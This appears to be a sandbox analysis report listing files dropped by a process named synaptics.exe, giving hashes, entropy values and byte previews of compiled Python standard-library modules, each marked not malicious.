                                                                                                                                                                                                                Preview:o........{-d.#.......................@...sV...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...G.d.d...d.e...Z.e.Z.z.d.d.l.m.Z...W.n...e.y-......d.Z.Y.n.w.g.d...Z.d.d...Z.i...Z.Z.d.d...Z.e.d...e.e.e.e.e.e.e.e.e.e.e.e.e.j.e.e...e.e...e.j.e.j f.D.].Z!e.e.e!<.q[e"e.d.d...Z!e!d.u.rpe.e.e!<.e#j.e.e#<.e$j.e.e$<.e%j.e.e%<.e&j.e.e&<.e.d.u.r.e.j.e.e.<.[.[!d.g.f.d.d...Z'i...Z(Z.d.d...Z)e)e.e.d...<.e)e.e.e...<.e)e.e.e...<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.j*<.e)e.e.<.e)e.e.<.e)e.e.j.<.e)e.e.j.<.e)e.e.j <.e)e.e.<.e'f.d.d...Z+e+e.e#<.e'f.d.d...Z,e,e.e.<.e'f.d.d...Z-e-e.e$<.e.d.u...r.e-e.e.<.d.d...Z.e.e.e.j/<.[.d.d...Z0..d.e'd...d.d...Z1[.[.[.d.S.).a....Generic (shallow and deep) copying operations...Interface summary:.. import copy.. x = copy.copy(y) # make a shallow copy of y. x = copy.deepcopy(y) # make a deep copy of y..For module specific errors, copy.Error is raised...The difference between shallow and deep copying is only relevant for.compound objects (object
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):4693
                                                                                                                                                                                                                Entropy (8bit):5.295791134589395
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:tCI7QMLHGjZW9X1XBrxbbJz0uqhUaCWfqmb5p2LYHjmTrhqH3TpYXGP2:LvHGyBrpb56eWfhqLYHjmTkH3TpY2P2
                                                                                                                                                                                                                MD5:48C545CBC6E372D3F85E77301C712B78
                                                                                                                                                                                                                SHA1:AD4BC882C0681E40ECDB2A3D4F3FC38F4D76D524
                                                                                                                                                                                                                SHA-256:D8A4F44E8656A360F9430F5F6BC758B55800458897686BD60316C8C434A738BF
                                                                                                                                                                                                                SHA-512:DFFA61757EBE07CA255EE470418AFA92C1D838C18CF64DB6EF73FF19EA69F1182E9EC281813B3D2804C13B63B27E2DF4148AC2B81FC682DEA61C67F86DCE493D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.Z.g.d...Z.i.Z.d.d.d...Z.d.d...Z.z.e...W.n...e.y.......Y.n.w.d.d...Z.e.e.e.e.....d.d...Z.e.e.e.e.B...e.....d.d...Z.d.Z.e.e.j...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.i.Z.i.Z.i.Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z.Helper to provide extensibility for pickle...This is only useful to add pickle support for extension types defined in.C, not for instances of user-defined classes..)...pickle..constructor..add_extension..remove_extension..clear_extension_cacheNc....................C...s0...t.|...s.t.d.....|.t.|.<.|.d.u.r.t.|.....d.S.d.S.).Nz$reduction functions must be callable)...callable..TypeError..dispatch_tabler....).Z.ob_typeZ.pickle_functionZ.constructor_ob..r.....(C:\Users\user\Desktop\tmp\lib\copyreg.pyr........s................r....c....................C...s....t.|...s.t.d.....d.S.).Nz.constructors must be callable).r....r....)...objectr....r....r....r........s..........r....c....................C...s....t.|.j.|.j.f.f.S...N)...complex..real..ima
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):11808
                                                                                                                                                                                                                Entropy (8bit):5.443550974423246
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:aJq1+B75hSIQIWWvBMKumwKZdlXiWQA3LYPqOW9PJFoKzckOMsj9XCCDH:aJqeLSIQ2OKuuZrXiWQA0shzJaYWH
                                                                                                                                                                                                                MD5:1355F3FE6D65F67ACA85A10A1EEB9DA4
                                                                                                                                                                                                                SHA1:654F89C47A473EA2F619FA26520C0A44BA7FD216
                                                                                                                                                                                                                SHA-256:17A5085F63BBCAC42A6FDD0B01FA53F3314781CCEC1ABFB3CB21E505521F564F
                                                                                                                                                                                                                SHA-512:29701EAB98F7A973C01C42A43EB3A3B236AA7D6DE006A9465EBB327E3136E1B770D54717AF1233DB6D119C060E887A1533B37A03D04C945AEF156C9A524F6678
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dZ@.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.e.d.e.....G.d.d...d.e...Z.e.d.e.....G.d.d...d.e...Z.e.d.e.....G.d.d...d...Z.G.d.d...d...Z.z.e...W.n...e.y.......e.Z.Y.n.w.G.d.d...d...Z.d.S.).z+.csv.py - read/write/investigate CSV files......N)...Error..__version__..writer..reader..register_dialect..unregister_dialect..get_dialect..list_dialects..field_size_limit..QUOTE_MINIMAL..QUOTE_ALL..QUOTE_NONNUMERIC..QUOTE_NONE..__doc__)...Dialect)...StringIO).r....r....r....r....r....r....r......excel..excel_tabr....r....r....r....r....r......Snifferr....r......DictReader..DictWriter..unix_dialectc....................@...sD...e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.S.).r....z.Describe a CSV dialect... This must be subclassed (see csv.excel). Valid attributes are:. delimiter, quotechar, escapechar, doublequote, skipinitialspace,.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):56543
                                                                                                                                                                                                                Entropy (8bit):5.249411277758165
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:xoPVdGbiwEyaNVxLZnkM238oZMpj6355j9RsFdVY:xWt1LMP5
                                                                                                                                                                                                                MD5:D0F833CE67C12032FFF4E2FA82F2BB0C
                                                                                                                                                                                                                SHA1:7BE66D06F5A01F978D9886D78919AD503DBBB723
                                                                                                                                                                                                                SHA-256:780ECF5DA88619C6532A1DFFF5854202EE8199E80318B18D7B788A5D9D7EDB2A
                                                                                                                                                                                                                SHA-512:70E0FA00CE3547DA2B43E3CDB34F85B8C8BC2FF8DDC606E842F6BE6BF5ABFDC8DA218281C947736BB28E0534D691182762A460DF3511343C94E3ED934ACCEBC5
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.a.......................@...sr...d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.d.Z.d.Z.d.Z.g.d...Z.d.g.Z.d.Z.e.d.d.....D.].Z.e...e.....e.e.7.Z.q/[.[.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d.k.scJ...e.d.e...d...k.smJ...e.d.e...d...k.swJ...d.d...Z.g.d...Z.g.d...Z.d d!..Z.d\d#d$..Z.d%d&..Z d'd(..Z!d)d*..Z"d+d,..Z#d-d...Z$d/d0..Z%d1d2..Z&d3d4..Z'd5d6..Z(d7d8..Z)d9d:..Z*d;d<..Z+G.d=d>..d>..Z,e,d?..e,_-e,d@dAdBdBdCdD..e,_.e,d.dE..e,_/G.dFdG..dG..Z0e0Z1e0d.d.d...e0_-e0d.dHdI..e0_.e,d.dJ..e0_/G.dKdL..dL..Z2G.dMdN..dNe3..Z4e4Z5[4e2Z6G.dOdP..dP..Z.e.Z7e.d.d.d...e._-e.dAdBdBdC..e._.e,d.dE..e._/G.dQdR..dRe0..Z8e8d.d.d...e8_-e8d.dHdIdAdBdBdC..e8_.e,d.dE..e8_/dSdT..Z9G.dUdV..dVe2..Z:e:.;e,d.....e:_<e:.;e,dAdBdW......e:_-e:.;e,dAdBdW....e:_.e8dXd.d.e:j<dY..Z=z.d.dZl>T.W.n...e?..y.......Y.d.S.w.[.[.[.[.[.[.[=[.[.[.['[([)[%[&[.[*[1[.[.[.[.[ [.[.[9[.[.[.[7[6[![.[+["[$[#[5d.d[l>m.Z...d.S.)]z.Concrete date/time and related types...See http://www.iana.org/time-
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):26073
                                                                                                                                                                                                                Entropy (8bit):5.284311175719468
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:wGTKcmNJ6I61HjkGoQEARW5nV3j412nrp+6s8LY4F8AGK/h3Ec:wiGNJgJEARW3Ea+VZ4F8AGK/Wc
                                                                                                                                                                                                                MD5:C6A035E5D58D39A99EEE9D8AF92C9B02
                                                                                                                                                                                                                SHA1:5F0AA9B8F3B98BE4F399E5E6C586BB228F8C386B
                                                                                                                                                                                                                SHA-256:F759C3657266C495BD5E7320D313CD294EA07277732D1DF63CCB99A58C5D1118
                                                                                                                                                                                                                SHA-512:8A09FF769DDF22E0E76ABBF67A3F92EA3E554DFAC93CE49975BA9202EA60FBCB5AC84C921DE685CFD047AAFC26FF0266C9CF09786BB5F0FFF6D9FE83FD58B3E5
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.d.l.Z.d.d.l.m.Z.m.Z...g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.Z.G.d.d...d.e...Z.G.d.d...d.e.d...Z.G.d.d...d.e.e...Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.d.d ..Z.d!d"..Z.d#d$..Z.d.S.)%.....N)...MappingProxyType..DynamicClassAttribute)...EnumMeta..Enum..IntEnum..Flag..IntFlag..auto..uniquec....................C...s....t.|.d...p.t.|.d...p.t.|.d...S.).z?. Returns True if obj is a descriptor, False otherwise.. ..__get__..__set__..__delete__)...hasattr)...obj..r.....%C:\Users\user\Desktop\tmp\lib\enum.py.._is_descriptor....s..............r....c....................C...sL...t.|...d.k.o%|.d.d.....|.d.d.........k.o.d.k.n.....o%|.d...d.k.o%|.d...d.k.S.).z=. Returns True if a __dunder__ name, False otherwise.. .....N..........Z.__.._.........len....namer....r....r......_is_dunder....s......&...........r....c....................C...sL...t.|...d.k.o%|.d...|.d.......k.o.d.k.n.....o%|.d.d....
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):4254
                                                                                                                                                                                                                Entropy (8bit):5.659278809130651
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:3Z1NvFl7gPHnOns99V7Ry+/63Tq7Y1qYmWVzHRJwZLaL1iCtiOy9:31vFl7g/OnsV7g7HzTRbdUV
                                                                                                                                                                                                                MD5:2E1C1772F68B3375D93776146D840C64
                                                                                                                                                                                                                SHA1:4D159790AC9D5E7FFBCF77811D9ACCCE67CB6574
                                                                                                                                                                                                                SHA-256:1D15C502540DEE0D35185D6255E001BCE4FFC4AB1C7F8BD4F0F4CBFBED77A504
                                                                                                                                                                                                                SHA-512:67EA0340BAAAD41D38E72D3F781B5B2C152035FFB637BC1426CC8EA42D71CBCA30C5B4A70C9302D2C0A46F063B34D21E10B764E1CBC78ADD15397C07E6686D14
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s|...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.d.l.m.Z...e...j.Z.[.d.d...Z.e.j.d.d.d...d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.S.).a....Filename matching with shell patterns...fnmatch(FILENAME, PATTERN) matches according to the local convention..fnmatchcase(FILENAME, PATTERN) always takes case in account...The functions operate by translating the pattern into a regular.expression. They cache the compiled regular expressions for speed...The function translate(PATTERN) returns a regular expression.corresponding to PATTERN. (It does not compile it.)......N)...filter..fnmatch..fnmatchcase..translate)...countc....................C...s"...t.j...|...}.t.j...|...}.t.|.|...S.).a....Test whether FILENAME matches PATTERN... Patterns are Unix shell style:.. * matches everything. ? matches any single character. [seq] matches any character in seq. [!seq] matches any char not in seq.. An initial period in FILENAME is not spec
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):28345
                                                                                                                                                                                                                Entropy (8bit):5.344797759090209
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:4oO3KwXQNi3/sZoyIw/kj5N4V+xIhb85NxshpCzCLF:4o16QNi30Cj5iV+0b853IMmLF
                                                                                                                                                                                                                MD5:BF172CCF72D64EE6567D0499F6AA4B08
                                                                                                                                                                                                                SHA1:7D9A3FD237A53CEAE9D21E4657A1DD05B54FBF42
                                                                                                                                                                                                                SHA-256:9BE3934AA828A3D8F822351B6F2D48133489AE75FEBA750503C0069DC2AA695A
                                                                                                                                                                                                                SHA-512:CEEA06346B254F2A82916980DFD564A9686C8D26AC7F41AFE31AF58626E6AD3BB7CDEA03A2176827397CC4D764B43368939401C55C5AA2BE767923B615B6C565
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.e.e.f.d.d...Z.e.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d d!..Z.e.f.d"d#..Z.e.f.d$d%..Z.d&e.f.d'e.f.d(e.f.g.d(e.f.d)e.f.d&e.f.g.d)e.f.d(e.f.d'e.f.g.d'e.f.d&e.f.d)e.f.g.d*..Z.d+d,..Z.d-d...Z.z.d.d/l m.Z...W.n...e!y.......Y.n.w.e"..Z#e#f.d0d1..Z$z.d.d2l m$Z$..W.n...e!y.......Y.n.w.G.d3d4..d4..Z%z.d.d5l m%Z%..W.n...e!y.......Y.n.w.G.d6d7..d7e"..Z&d8d9..Z'e.d:g.d;....Z(G.d<d=..d=e)..Z*e"..f.e+e,h.e-e.e/f.d>d?..Z0dXdBdC..Z1dDdE..Z2z.d.dFl m2Z2..W.n...e!..y;......Y.n.w.dGdH..Z3dIdJ..Z4dYdLdM..Z5dNdO..Z6dPdQ..Z7dRdS..Z8G.dTdU..dU..Z9e"..Z:G.dVdW..dW..Z;dKS.)ZzEfunctools.py - Tools for working with functions and callable objects.)...update_wrapper..wraps..WRAPPER_ASSIGNMENTS..WRAPPER_UPDATES..total_ordering..cache..cmp_to_key..lru_cache..reduce..partial..partialmethod..singledispatch..si
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3917
                                                                                                                                                                                                                Entropy (8bit):5.162544920340737
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:yqsfAs4EvXosntVf4/zsSQ1ow+2U/tAaDKDj51dmvuoZ:hs4gtKyow8/tjgqWoZ
                                                                                                                                                                                                                MD5:0893483D5099662126A9F76E9D940B34
                                                                                                                                                                                                                SHA1:3421D7482E19D23673D33DD97D7767AF61531317
                                                                                                                                                                                                                SHA-256:7E3F9D032D3B050873798B26EE65DCA2DB3AC883D301FBDCA4F96CE98F0D1327
                                                                                                                                                                                                                SHA-512:E2B6F7BE32A72D8B7431E442431895C0182CD143997EBC896DC7F9488C3F09C27B0980EC1FA95520019EF6B1FFA465A8E2128AF8E33A05E5FE278B8FB0D42C76
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z..Path operations common to more than one OS.Do not use directly. The OS specific modules import the appropriate.functions from this module themselves.......N)...commonprefix..exists..getatime..getctime..getmtime..getsize..isdir..isfile..samefile..sameopenfile..samestatc....................C...s*...z.t...|.....W.d.S...t.t.f.y.......Y.d.S.w.).zDTest whether a path exists. Returns False for broken symbolic linksFT)...os..stat..OSError..ValueError)...path..r.....,C:\Users\user\Desktop\tmp\lib\genericpath.pyr........s................r....c....................C....4...z.t...|...}.W.n...t.t.f.y.......Y.d.S.w.t...|.j...S.).z%Test whether a path is a regular fileF).r....r....r....r......S_ISREG..st_mode).r......str....r....r....r.........................r....c....................C...r....).z<Return true if the
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):6855
                                                                                                                                                                                                                Entropy (8bit):5.593488193903666
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:kdPjhwzUgQUdROKh0WXI7dQia/586skt6iojyyt8NQCcx54bNdO9DF4irm/tMm6u:kRmE5+odQiaB8Jktv4OmVP/4XbJ4nJ0
                                                                                                                                                                                                                MD5:35232F9BAED05CEDC693D888C786DD16
                                                                                                                                                                                                                SHA1:A429AF8D5796BBBBB9002CB3B3222F3993D9AB5A
                                                                                                                                                                                                                SHA-256:646551DA558ECE77F57C25B48574166C3715845841DEF543A1128B2A3C485832
                                                                                                                                                                                                                SHA-512:4D115067429CB99DE0E315E0592212BE034603AED116EC99CE59C06D5B966841BCD0D554B7B0AD8E0C2F9077D7DDE2058662DA9F58EA457B4D7A1DDC9227EE6F
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.).......................@...sl...d.Z.d.Z.e.e...Z.e.e...Z.e.d...Z.i.Z.d.d.h.Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.z.d.d.l.Z.e.Z.e.Z.e...e.j...Z.W.n...e.yG......d.Z.e.Z.e.Z.Y.n.w.z.d.d.l.m.Z...W.n*..e.yz......d.d.l.m.Z...e.d.d...e.d...D.....Z.e.d.d...e.d...D.....Z.d.d.d...Z.Y.n.w.z.d.d.l.m.Z...W.n...e.y.......Y.n.w.e.D.].Z.z.e.e...e...e.<.W.q...e.y.......d.d.l.Z.e...d.e.....Y.q.w.[.[.[.[.[.[.d.S.).a3...hashlib module - A common interface to many hash functions...new(name, data=b'', **kwargs) - returns a new hash object implementing the. given hash function; initializing the hash. using the given binary data...Named constructor functions are also available, these are faster.than using new(name):..md5(), sha1(), sha224(), sha256(), sha384(), sha512(), blake2b(), blake2s(),.sha3_224, sha3_256, sha3_384, sha3_512, shake_128, and shake_256...More algorithms may be available on your platform but the above are guaranteed
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):13875
                                                                                                                                                                                                                Entropy (8bit):5.351682965499902
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:+nqTYZnQtot7ItafyjjWya/PXOFGRxibJWiTqe0hN2leov+Ugn:+nEYZn0ot7It7j3aXOgRxiM0uN2kk+/n
                                                                                                                                                                                                                MD5:6742BB7BA2292F159C07A0794DCA23C0
                                                                                                                                                                                                                SHA1:EE6898DD85E6A807D6CB768B544DF37D96B8882C
                                                                                                                                                                                                                SHA-256:8810EB371478399EE6422F17F51E1E50292756C7899D00D1FE3B90362A6B0BE8
                                                                                                                                                                                                                SHA-512:1068AA99F8DF30DBEE3F72668318502EA01360223FB62E825E92B804E33CB4189165A6275AB59E6B1E8E2749E0D1A3EC897B96DCC4377888946536806309C3E6
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.[.......................@...sD...d.Z.d.Z.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...d.d...Z.d*d d!..Z.d*d"d#..Z.z.d$d%l.T.W.n...e.yY......Y.n.w.z.d$d&l.m.Z...W.n...e.yk......Y.n.w.z.d$d'l.m.Z...W.n...e.y}......Y.n.w.z.d$d(l.m.Z...W.n...e.y.......Y.n.w.e.d)k.r.d$d.l.Z.e.e.........d.S.d.S.)+a....Heap queue algorithm (a.k.a. priority queue)...Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for.all k, counting elements from 0. For the sake of comparison,.non-existing elements are considered to be infinite. The interesting.property of a heap is that a[0] is always its smallest element...Usage:..heap = [] # creates an empty heap.heappush(heap, item) # pushes a new item on the heap.item = heappop(heap) # pops the smallest item from the heap.item = heap[0] # smallest item on the heap without popping it.heapify(x) # transforms list into a heap, in-place, in linear time
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):6983
                                                                                                                                                                                                                Entropy (8bit):5.294876689868299
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:fXFTSdeLSo3yfjb/3xXrCx5PgT1nxc203AbC:fXFT0eLhyX1K5S1nv0QbC
                                                                                                                                                                                                                MD5:41603A7E23EF13076470B65C8FACDDE8
                                                                                                                                                                                                                SHA1:A2435F3052458C1E57263728775424D8337D1869
                                                                                                                                                                                                                SHA-256:26149805BCF65C4B0C591D7E009FA489925CA75870BB698BA762C1C8562DBC13
                                                                                                                                                                                                                SHA-512:85C78263585B5E3BAFB0AA3526E99860CBF029ADE458D8608F0F5AAE4B43788CC2DAEC7917B41CEFAE9E41170C31C9B8748CC7611EE3B22EF4E7FCADD70E89A9
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.Z.d.d.l.Z.z.d.d.l.Z.W.n...e.y.......d.Z.d.Z.d.d.l.m.Z...Y.n.w.e.j.Z.e.e.j...Z.d.d.l.Z.e.d.d...e.d...D.....Z.e.d.d...e.d...D.....Z.d.Z.G.d.d...d...Z.d.d.d...Z.d.d...Z.d.S.).zqHMAC (Keyed-Hashing for Message Authentication) module...Implements the HMAC algorithm as described by RFC 2104.......N)..._compare_digestc....................c..........|.].}.|.d.A.V...q.d.S.)..\...N.......0..xr....r.....%C:\Users\user\Desktop\tmp\lib\hmac.py..<genexpr>.............r.........c....................c...r....)..6...Nr....r....r....r....r....r........r....c....................@...sf...e.Z.d.Z.d.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...HMACz~RFC 2104 HMAC class. Also complies with RFC 4231... This supports the API for Cryptographic Hash Functions (PEP 247).. .@...)..._hmac.._inner.._outer..block_size..digest_sizeN..c....................C...s....t.|.t.t.f...s.t.d.t.|...j.......|.s.t.d.....t.r<t.|
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3673
                                                                                                                                                                                                                Entropy (8bit):5.387204534690096
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:njeBVAsKEv1YlurRNZsmi/VA61vWF/3+XIQjC2Ai3QuAXuhgwGzPOcGcMzzMfSWI:nUK0iSxOmoWF2vLAy/hyzP7GcmYa7RXn
                                                                                                                                                                                                                MD5:8D2203CE3498FB154974CC22406DB1AF
                                                                                                                                                                                                                SHA1:5105B8868533E67887FA5A2A101A6CC1F0DFC23D
                                                                                                                                                                                                                SHA-256:AFC3492464DE11038D1C10CDA01F77BF696F0E8D40473D051FC45010F493817F
                                                                                                                                                                                                                SHA-512:526856107C45154A04D454B11892B18912933C6812F720987746DD78505A777983E3EAACF06420AD6E3B33ACAC536E5196B8ACBDCB8E82AE472CA3CA4AFB7D71
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...sH...d.Z.d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d...Z.d.e._.d.Z.d.Z.d.Z.G.d.d...d.e.j.e.j.d...Z.G.d.d...d.e.j.e...Z.G.d.d...d.e.j.e...Z.G.d.d...d.e.j e...Z!e.."e.....e.e.e.e.e.f.D.].Z#e.."e#....que.e.f.D.].Z#e!."e#....q.[#z.d.d.l.m$Z$..W.n...e%y.......Y.d.S.w.e.."e$....d.S.).a....The io module provides the Python interfaces to stream handling. The.builtin open function is defined in this module...At the top of the I/O hierarchy is the abstract base class IOBase. It.defines the basic interface to a stream. Note, however, that there is no.separation between reading and writing to streams; implementations are.allowed to raise an OSError if they do not support a given operation...Extending IOBase is RawIOBase which deals simply with the reading and.writing of raw bytes to a stream. FileIO subclasses RawIOBase to provide.an interface to OS files...BufferedIOBase deals with buffering on a raw
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):61461
                                                                                                                                                                                                                Entropy (8bit):5.306008432548493
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:xiqqs3deqQmjuqJqq9qhIOGqaqzIVqOq/sqmqeXWqJqZqoqfqEqNqqBNqzSq2qfe:LamjPaWNFGc81veYm1o4Jg5wLlf8x7LR
                                                                                                                                                                                                                MD5:99D8884987B866D87431D517027A609B
                                                                                                                                                                                                                SHA1:C51727F482B0F044EDC4740BAEAD4E20C7AEA9C8
                                                                                                                                                                                                                SHA-256:374333B90BED601D15D352B33D3CDCBF74273F776106BE6F493AD270B084EAF9
                                                                                                                                                                                                                SHA-512:B8CD30C1C0FFB7A6CADE29FEDEDC6E74DCC1D2C30BF2FD2AE8753DC2E45FF5170B08DD9363348C1D12D80F6E3DB65F301374F38D45F9847673A7914A8C737366
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.,.......................@...s....d.Z.d.Z.d.d.l.Z.d.Z.d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.d...Z.d=d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.d!d"..Z.G.d#d$..d$..Z.d.a.e.j.G.d%d&..d&e.....Z.e.j.G.d'd(..d(e.....Z.G.d)d*..d*..Z.G.d+d,..d,e.e...Z.G.d-d...d.e...Z.G.d/d0..d0e.e...Z.G.d1d2..d2..Z.e.e._.G.d3d4..d4..Z.G.d5d6..d6e.e...Z G.d7d8..d8e ..Z!G.d9d:..d:e.e...Z"G.d;d<..d<..Z#e#e _.d.S.)>z.A fast, lightweight IPv4/IPv6 manipulation library in Python...This library is used to create/poke/manipulate IPv4 and IPv6 addresses.and networks...z.1.0.....N. .......c....................@........e.Z.d.Z.d.Z.d.S.)...AddressValueErrorz%A Value Error related to the address.N....__name__..__module__..__qualname__..__doc__..r....r.....*C:\Users\user\Desktop\tmp\lib\ipaddress.pyr.................r....c....................@...r....)...NetmaskValueErrorz%A Value Error related to the netmask.Nr....r....r....r....r....r........r....r....c...................
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):937
                                                                                                                                                                                                                Entropy (8bit):5.3733040805997465
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:PBMgKEVTSAvFwzVCI0L67avc0Kb4S0bJB6R/rju:PzVu8wzVmxcZt0bJB65G
                                                                                                                                                                                                                MD5:3D6EA14177B89E8EDFF4D2F4F5F36115
                                                                                                                                                                                                                SHA1:BBB8DEBFD3D139965CA1FDB27408F8A5AD9CE7E3
                                                                                                                                                                                                                SHA-256:C66D49B9536B01B8AA65962F3D00DC09BFDF85572889976B4198C1B3AD84FF0D
                                                                                                                                                                                                                SHA-512:96490787F80BEA047186B23C26758C64D831B4ED00A5175B1C3180EBD61453EA61F49D04B3A4FB12B78568727CBCA065F9D4BF3D2D49B6F82A308C253CAAA58E
                                                                                                                                                                                                                Malicious:false
